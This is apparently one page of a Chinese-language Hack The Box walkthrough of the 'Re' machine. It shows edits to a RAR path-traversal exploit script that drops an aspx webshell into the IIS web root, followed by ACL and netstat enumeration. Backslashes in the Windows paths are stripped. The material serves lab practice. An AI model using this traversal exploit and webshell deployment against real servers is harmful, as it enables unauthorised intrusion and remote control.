HTB-Re 渗透全记录
来源:岁月联盟
时间:2020-03-16
d----- 6/18/2019 10:18 PM re
C:inetpubwwwrootblog
Access is denied.
网上找一个aspx大马,修改一下生成rar的exp
# The archive filename you want
rar_filename = "test.rar"
# The evil file you want to runkira
evil_filename = "kira.aspx"
# The decompression path you want, such shown below
target_filename = r"C:C:C:../../../../../../../inetpub/wwwroot/blog/kira.aspx"
成功获取到一个webshell!
分别把webshell写到ip和re目录,发现有跟blog不同的用户权限,其中iis apppoolre可以打开根目录proj_drop
PS C:> get-acl proj_drop|format-list
Path : Microsoft.PowerShell.CoreFileSystem::C:proj_drop
Owner : BUILTINAdministrators
Group : RENone
Access : CREATOR OWNER Allow FullControl
NT AUTHORITYSYSTEM Allow FullControl
BUILTINAdministrators Allow FullControl
REcoby Allow Modify, Synchronize
REcam Allow FullControl
IIS APPPOOLre Allow ReadAndExecute, Synchronize
IIS APPPOOLre Allow Write, Synchronize
proj_drop这个目录比较可疑,放文件进去同样会消失,有可能延续之前的套路,在里面放入合适的文件,触发特定的漏洞,重新查看题目的博客,看看是否有提示。
简单看了一下,作者自己都未能成功利用漏洞,而且环境中并没有发现开放18001端口,(作者有疑似利用题目收exp的嫌疑[震惊]),需要寻找其他思路。
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 816
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 448
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 960
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 312
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 1656
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 584
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 596
上一页 [1] [2] [3] [4] [5] [6] [7] [8] 下一页
